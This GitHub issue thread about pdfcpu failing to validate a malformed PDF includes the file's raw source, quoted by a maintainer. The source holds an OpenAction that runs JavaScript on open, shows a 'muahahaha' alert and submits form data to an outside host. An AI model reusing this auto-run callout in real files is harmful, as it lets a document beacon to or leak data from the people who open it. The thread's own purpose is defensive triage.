### ISSUE TITLE
Read: xRefTable failed: pdfcpu: can't find last xref section

### ISSUE THREAD

**Issue by minhnguyen98** [pdfcpu/pdfcpu#625]
Get error above when validate specific pdf file
`pdfcpu validate -vv abcd.pdf &> crash.log`
This file can be opened by Mac Preview
Mac OS version: Ventura 13.3.1
pdfcpu version: v0.4.1

[abcd.pdf](https://github.com/pdfcpu/pdfcpu/files/11550323/abcd.pdf)
[crash.log](https://github.com/pdfcpu/pdfcpu/files/11550324/crash.log)

**Comment by petervwyatt** [comment]
That's because this PDF is highly malformed and invalid according to all PDF specs: it has no cross-reference table, nor a `startxref`, nor a `/Size` entry in the trailer nor a `/Length` key on the content stream. 

Just because it happens to work in some implementations doesn't make it valid.

**Comment by hhrutter** [comment]
Agreed - I am also hesitant to repair files written by an anonymous PDFWriter:
```
%PDF-1.2 
9 0 obj
<<
>>
stream
BT/ 9 Tf(muahahaha) Tj ET
endstream
endobj
4 0 obj
<<
/Type /Page
/Parent 5 0 R
/Contents 9 0 R
>>
endobj
5 0 obj
<<
/Kids [4 0 R ]
/Count 1
/Type /Pages
/MediaBox [ 0 0 99 50 ]
>>
endobj

11 0 obj
<<
  /Type /Action
/S /JavaScript /JS (
  app.alert("muahahaha");
  this.submitForm('https://sb-pro.ag1.evidence.com/test');
  console.println("done");
)
>>
endobj

3 0 obj
<<
/Pages 5 0 R
/Type /Catalog
/OpenAction 11 0 R
>>
endobj
trailer
<<
/Root 3 0 R
>>
%%EOF
```
